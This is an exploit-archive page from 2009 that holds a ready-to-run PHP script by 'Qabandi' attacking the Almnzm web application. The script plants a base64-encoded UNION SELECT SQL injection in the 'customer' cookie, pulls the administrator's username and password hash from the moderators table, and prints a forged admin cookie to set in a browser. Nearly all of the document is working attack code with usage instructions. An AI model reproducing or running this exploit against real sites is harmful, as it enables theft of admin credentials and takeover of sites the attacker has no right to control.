[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Almnzm (COOKIE: customer) Remote SQL Injection Vulnerability
# Published : 2009-06-29
# Author : Qabandi
# Previous Title : osTicket 1.6 RC4 Admin Login Blind SQL Injection Vulnerability
# Next Title : PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability


<?
print_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ__
---Script Almnzm SQL INJECTION     __/QQQ/````````````````QQQ___
                                 _/QQQQQ/                  QQQQQQ
---"Powered by Almnzm"          /QQQQ/``                    ```QQQQ
                               /QQQQ/                          QQQQ
---admin cookie create        |QQQQ/    By  Qabandi             QQQQ|
---Add PhP Ext                |QQQQ|                            |QQQQ|
---Upload php in adminCP      |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ       iqa[a]hotmail.fr     /QQQQ|
                               QQQQ                      __  /QQQQ/
                                QQQQ                    /QQ_QQQQ/
                                 QQQQ                   QQQQQQQ/
                                  QQQQQ                 /QQQQQ/_
                                   ``QQQQQ_____________/QQQ/QQQQ_
                                      ``QQQQQQQQQQQQQQQQQQQ/  `QQQQ
');

if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/
-----------------------------------------------------------------------------
');
die;
}
$host = $argv[1];
$p = "http://".$host.$argv[2];

 function QAB_GET($qabandi, $from){
$content = $from;
preg_match_all("/<".$qabandi.">([^<]+)</".$qabandi.">/",
    $content,
    $out, PREG_PATTERN_ORDER);

return $out[1][0];
 }



          $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0rn";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn";
          $packet.="Pragma: no-cachern";
          $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";rn";
          $packet.="Connection: Closernrn";
	$o = @fsockopen($host, 80);
	if(!$o){
		echo "n[x] No response...n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "n[x] 404 Not Found... Make sure of path. n";
		die;
	}
	
echo "nn---Qabandi Is Here-------------------------------------------nn";

$Q_ver = QAB_GET("version", $data);
$Q_usr = QAB_GET("user", $data);
$Q_pwd = QAB_GET("pass", $data);


echo "[q]version:n".$Q_ver."nn";
echo "[q]Admin User:n".$Q_usr."nn";
echo "[q]Admin Hash:n".$Q_pwd."nn";

$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);

echo "n---Admin Cookie:n";
echo "nnjavascript:document.cookie='user=".$qookie."';nn";
echo "nn---Qabandi Was Here------------------------------------------nn";
die;
?>

# www.Syue.com [2009-06-29]